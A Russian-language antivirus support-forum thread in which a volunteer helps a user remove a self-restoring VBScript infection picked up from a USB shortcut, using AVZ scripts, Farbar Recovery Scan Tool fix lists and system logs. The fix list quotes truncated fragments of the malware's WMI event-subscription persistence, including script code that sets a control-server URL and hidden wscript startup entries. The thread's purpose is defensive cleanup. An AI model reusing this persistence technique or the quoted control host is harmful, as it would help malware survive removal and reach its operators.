Korlate 0 Опубликовано 22 мая, 2019 Share Опубликовано 22 мая, 2019 (изменено) Получил его после открытия ярлыка на флешке. Nod 32 по кругу его удаляет а он всё восстанавливается и DR.Web выдаёт ошибку на разных этапах сканирования .Вроде систему не грузит но само его наличие напрягает.Подскажите как его удалить,спасибо. https://ibb.co/7vhjyDF CollectionLog-2019.05.22-21.47.zip Изменено 22 мая, 2019 пользователем Korlate Ссылка на сообщение Поделиться на другие сайты
Mark D. Pearlstone 1 704 Опубликовано 22 мая, 2019 Share Опубликовано 22 мая, 2019 Порядок оформления запроса о помощи Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 22 мая, 2019 Share Опубликовано 22 мая, 2019 Здравствуйте. Выполните скрипт в AVZ из папки Autologger begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\Users\Korlate\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs',''); DeleteFile('C:\Users\Korlate\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs','64'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end. Обратите внимание: будет выполнена перезагрузка компьютера.Выполните скрипт в AVZ begin CreateQurantineArchive('c:\quarantine.zip'); end. c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678Полученный после загрузки ответ сообщите здесь. Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. Ссылка на сообщение Поделиться на другие сайты
Korlate 0 Опубликовано 22 мая, 2019 Автор Share Опубликовано 22 мая, 2019 (изменено) Всё сделал Забыл сказать что он так же носил название myminer.exe и открывался под wsscript.eхe.Но после чистки файлов через реестр,process hacker и Malwarebytes вроде исчез но vbs/agent.nos остался.Не уверен связаны ли они вместе или нет. CollectionLog-2019.05.22-22.14.zip Изменено 22 мая, 2019 пользователем Korlate Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 22 мая, 2019 Share Опубликовано 22 мая, 2019 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files. 3. Нажмите кнопку Scan. 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению. Ссылка на сообщение Поделиться на другие сайты
Korlate 0 Опубликовано 23 мая, 2019 Автор Share Опубликовано 23 мая, 2019 (изменено) Сделал Farbar.rar Изменено 23 мая, 2019 пользователем Korlate Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 23 мая, 2019 Share Опубликовано 23 мая, 2019 1. Выделите следующий код: Start:: CreateRestorePoint: C:\Users\Korlate\AppData\Local\Temp\rknrl.vbs HKLM\...\Run: [winstart] => wscript.exe //B "C:\Users\Korlate\AppData\Local\Temp\rknrl.vbs" <==== ATTENTION Startup: C:\Users\Korlate\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs [2019-05-23] () [File not signed] S2 MsRkNrL; %systemroot%\system32\wscript.exe //B "C:\autoexec.vbs" [X] 2019-05-22 21:58 - 2019-05-23 07:36 - 000000000 ___SH C:\autoexec.vbs 2019-05-19 18:16 - 2019-05-19 18:18 - 000182730 ____H C:\Users\Korlate\Desktop\~WRL0980.tmp WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"rknrl_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"rknrl_filter\":: WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"rknrlmon_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"rknrl_filter\":: WMI:subscription\__TimerInstruction->rknrl_itimer:: WMI:subscription\__IntervalTimerInstruction->rknrl_itimer:: WMI:subscription\__EventFilter->rknrl_filter::[Query => select * from __timerevent where timerid="rknrl_itimer"] WMI:subscription\ActiveScriptEventConsumer->rknrlmon_consumer::[ScriptText => On Error Resume Next:Dim wShell,Fso,mHttp,Wmi:Set wShell = CreateObject("WScript.shell"):host="http://a002.aigoingtokill.club/ctrl/playback.php":Set Fso = CreateObject("scripting.filesystemobject"):Set mHttp = CreateObject("msxml2.xmlhttp"):Set Wmi=GetObject("winmgmts:\\.\root\cimv2"):Set Tsk=Wmi.ex (the data entry has 6931 more characters).] WMI:subscription\ActiveScriptEventConsumer->rknrl_consumer::[ScriptText => On Error Resume Next:Dim Fso,shellobj,objFile,Wmi,regPath,startPath:Set shellobj = CreateObject("WScript.Shell"):Set FSO = CreateObject("Scripting.Filesystemobject"):Set Wmi=getobject("winmgmts:\\.\root\cimv2"):set Wpro=Wmi.execquery("select * from win32_process where name='wscript.exe'"):regPath = (the data entry has 124886 more characters).] ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File Folder: C:\Users\Korlate\AppData\Roaming\rootnuko Reboot: End:: 2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).3. Запустите Farbar Recovery Scan Tool. 4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. Ссылка на сообщение Поделиться на другие сайты
Korlate 0 Опубликовано 23 мая, 2019 Автор Share Опубликовано 23 мая, 2019 Сделал Fixlog.txt Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 23 мая, 2019 Share Опубликовано 23 мая, 2019 Что с проблемой? Ссылка на сообщение Поделиться на другие сайты
Korlate 0 Опубликовано 23 мая, 2019 Автор Share Опубликовано 23 мая, 2019 Решилась,спасибо за помощь. Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 23 мая, 2019 Share Опубликовано 23 мая, 2019 Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе. Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10); Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу; Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt; Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt; Процитируйте содержимое файла в своем следующем сообщении. Ссылка на сообщение Поделиться на другие сайты
Korlate 0 Опубликовано 23 мая, 2019 Автор Share Опубликовано 23 мая, 2019 SecurityCheck by glax24 & Severnyj v.1.4.0.53 [27.10.17]WebSite: www.safezone.ccDateLog: 23.05.2019 20:50:20Path starting: C:\Users\Korlate\AppData\Local\Temp\SecurityCheck\SecurityCheck.exeLog directory: C:\SecurityCheck\IsAdmin: TrueUser: KorlateVersionXML: 6.44is-21.05.2019___________________________________________________________________________Windows 7(6.1.7601) Service Pack 1 (x64) Ultimate Lang: Russian(0419)Дата установки ОС: 25.11.2018 11:30:06Статус лицензии: Windows® 7, Ultimate edition Постоянная активация прошла успешно.Режим загрузки: NormalБраузер по умолчанию: C:\Program Files\Mozilla Firefox\firefox.exeСистемный диск: C: ФС: [NTFS] Емкость: [49.9 Гб] Занято: [31.2 Гб] Свободно: [18.7 Гб]------------------------------- [ Windows ] -------------------------------Internet Explorer 11.0.9600.17843 Внимание! Скачать обновления^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^Контроль учётных записей пользователя отключен (Уровень 1)^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^Автоматическое обновление отключено (-1)Центр обновления Windows (wuauserv) - Служба работаетЦентр обеспечения безопасности (wscsvc) - Служба работаетУдаленный реестр (RemoteRegistry) - Служба остановленаОбнаружение SSDP (SSDPSRV) - Служба работаетСлужбы удаленных рабочих столов (TermService) - Служба остановленаСлужба удаленного управления Windows (WS-Management) (WinRM) - Служба остановлена------------------------------- [ HotFix ] --------------------------------HotFix KB3020369 Внимание! Скачать обновленияHotFix KB3125574 Внимание! Скачать обновленияHotFix KB4012212 Внимание! Скачать обновленияHotFix KB4499164 Внимание! Скачать обновления------------------------------ [ MS Office ] ------------------------------Microsoft Office 2013 x64 v.15.0.4569.1506---------------------------- [ Antivirus_WMI ] ----------------------------ESET Security (выключен и устарел)--------------------------- [ FirewallWindows ] ---------------------------Брандмауэр Windows (MpsSvc) - Служба работает--------------------------- [ AntiSpyware_WMI ] ---------------------------ESET Security (выключен и устарел)Windows Defender (выключен и устарел)---------------------- [ AntiVirusFirewallInstall ] -----------------------ESET Security v.12.1.34.0--------------------------- [ OtherUtilities ] ----------------------------Microsoft .NET Framework 4.5.2 v.4.5.51209 Внимание! Скачать обновленияSteam v.2.10.91.91Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления^Удалите старую версию, скачайте и установите новую.^-------------------------------- [ Arch ] ---------------------------------WinRAR 5.50 (64-разрядная) v.5.50.0 Внимание! Скачать обновления--------------------------------- [ P2P ] ---------------------------------µTorrent v.1.8.2 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.------------------------------- [ Browser ] -------------------------------Mozilla Firefox 66.0.5 (x64 ru) v.66.0.5 Внимание! Скачать обновления^Проверьте обновления через меню Справка - О Firefox!^------------------ [ AntivirusFirewallProcessServices ] -------------------C:\Program Files\ESET\ESET Security\egui.exe v.10.7.79.0C:\Program Files\ESET\ESET Security\eguiProxy.exe v.10.7.79.0ESET Service (ekrn) - Служба работаетC:\Program Files\ESET\ESET Security\ekrn.exe v.10.7.79.0ESET Firewall Helper (ekrnEpfw) - Служба работаетC:\Program Files\ESET\ESET Security\ekrn.exe v.10.7.79.0Защитник Windows (WinDefend) - Служба остановлена----------------------------- [ End of Log ] ------------------------------ Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 23 мая, 2019 Share Опубликовано 23 мая, 2019 Выполните рекомендованное, и на этом закончим. Ссылка на сообщение Поделиться на другие сайты
Korlate 0 Опубликовано 23 мая, 2019 Автор Share Опубликовано 23 мая, 2019 А что это было?Майнер? Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 23 мая, 2019 Share Опубликовано 23 мая, 2019 Сомнительно. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения